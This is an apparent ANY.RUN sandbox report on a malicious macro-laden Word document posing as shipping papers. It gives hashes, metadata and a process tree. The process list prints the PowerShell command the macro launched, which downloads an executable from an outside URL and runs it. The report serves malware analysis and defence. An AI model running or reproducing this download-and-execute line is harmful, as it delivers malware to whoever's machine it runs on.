analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6a01330ba5ac47391b234dd17223d80deb02b527913276a4ac42c395f25e9df0

Full analysis: https://app.any.run/tasks/a5f58f25-cfa5-4529-b871-b92361b8e4d2
Verdict: Malicious activity
Analysis date: November 14, 2018, 18:39:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

EF3C66CDC2CCC0F4B6E02B6A71FF3132

SHA1:

E0F1FA1FEF74976BE6C89252876179D10362C1A5

SHA256:

6A01330BA5AC47391B234DD17223D80DEB02B527913276A4AC42C395F25E9DF0

SSDEEP:

3072:oi0I2KrahB/rj1ExeQgnR9LJrX+UhPNG0gWhfREFGi7mpoQqVzPZNnBH/:oi0fKrw/rj1Ex1wR9LbN/gOW0i791Vd3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3232)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3232)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3516)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2108)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3232)
      • WINWORD.EXE (PID: 2108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x9828be31
ZipCompressedSize: 406
ZipUncompressedSize: 1512
ZipFileName: [Content_Types].xml

XML

Template: Shipping Documents.doc
TotalEditTime: 12 minutes
Pages: 1
Words: 3
Characters: 21
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: 23
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: Dimitri czar
RevisionNumber: 6
CreateDate: 2018:07:16 16:21:00Z
ModifyDate: 2018:11:13 18:12:00Z

XMP

Title: -
Subject: -
Creator: Dimitri czar
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs explorer.exe no specs winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2108"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6a01330ba5ac47391b234dd17223d80deb02b527913276a4ac42c395f25e9df0.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1964"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3232"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6a01330ba5ac47391b234dd17223d80deb02b527913276a4ac42c395f25e9df0.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3516powershell $a = $env:temp + '\VagLyWsii.exe';WGet 'https://a.doko.moe/ziptcn' -outFiLe $a;start $aC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 985
Read events
1 290
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C2C.tmp.cvr
MD5:
SHA256:
2108WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6AB743EE-532C-4517-8A71-7029BE4923F5}.tmp
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR207F.tmp.cvr
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SLYX596T5L214R5JRFEY.temp
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5e3290.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$01330ba5ac47391b234dd17223d80deb02b527913276a4ac42c395f25e9df0.docmpgc
MD5:0C73110F1D76D47B07AAE6ABC1DAFD3C
SHA256:DBCE8F3D8DF84A82FAE1BD1A5AD88F28F1C98D6D43F1CD41B09B99C38F27776E
3232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$01330ba5ac47391b234dd17223d80deb02b527913276a4ac42c395f25e9df0.docpgc
MD5:61A1D562F96799F02C0D3ACDC6CF8093
SHA256:E3ABD0B8240A0E466C9520E282FBF41A98C39D39FA96D56EDC9A0BF15B0383FF
2108WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:85283E8C73AC10A255BBE4286BF1BDB3
SHA256:0020F0707504300A48B9B083CDF48B2783CA33CFEDF40EFB79F861241E0A6BF5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info